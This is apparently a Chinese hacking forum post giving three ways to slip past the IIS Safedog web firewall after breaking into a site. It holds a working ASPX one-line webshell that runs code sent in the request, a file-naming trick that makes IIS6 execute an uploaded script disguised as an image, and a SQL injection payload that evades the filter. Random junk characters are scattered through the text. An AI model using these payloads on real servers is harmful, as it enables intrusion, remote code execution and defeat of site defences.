1、绕过IIS安全狗的一句话。: @ {. k! U8 r6 `; `$ c/ C" ]
前几天测试一个网站。找到突破口之后,写入webshell,但服务器上装有IIS安全狗,平时常用的一句话或者shell都用不了。下面这段.net一句话可以突破。- C: j2 e( K5 g6 Q4 ]) C# Q
<%@ Page Language="C#" ValidateRequest="false" %> <%try{System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["admin163.net"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null,null); } catch { }%>连接端用cncert的aspx一句话客户端。
1 R; U6 B( W1 o; {, T4 o1 `9 Q ^( U i
2、IIS6.0解析漏洞遇到安全狗。
5 L- A1 S" z/ B0 b文件名为
. C$ z. h% @ x* T- {) g) M$ shttp://www.xxxxx.com/sh3llc0de.asp;1.jpg2 q) g6 y) L: ?8 {6 b' j* F( S
0 s& E" n' b4 B2 T& s这样的会被IIS安全狗果断屏蔽。5 Z9 i9 z6 f) [# G
改成如下名称,IIS6一样会解析:
1 U0 T# o' [' B/ p# ?www.xxxxx.com/;1.asp;1.jpg' N# [4 s2 O8 ]: G- M
+ t6 J8 f4 k+ Z1 W4 [
3、安全狗的注入绕过。+ ]! a5 {+ Y6 }
常用的如r00ts.asp?id=1 and 1=1 是会被安全狗屏蔽的。& d, u; c9 Y. W& i
但如果:! J% t: I N, I5 ?8 c0 a
r00ts.asp?r00ts.com=%00.&id=69%20 and 1=1
9 W# @9 z8 w3 z9 q7 t就可以成功绕过了。
3 V: h! }5 ~" L5 k( `: y7 F7 q( C5 s7 H; F: _- r/ b
7 A- l0 _2 |# A' u% B- Q( e+ K |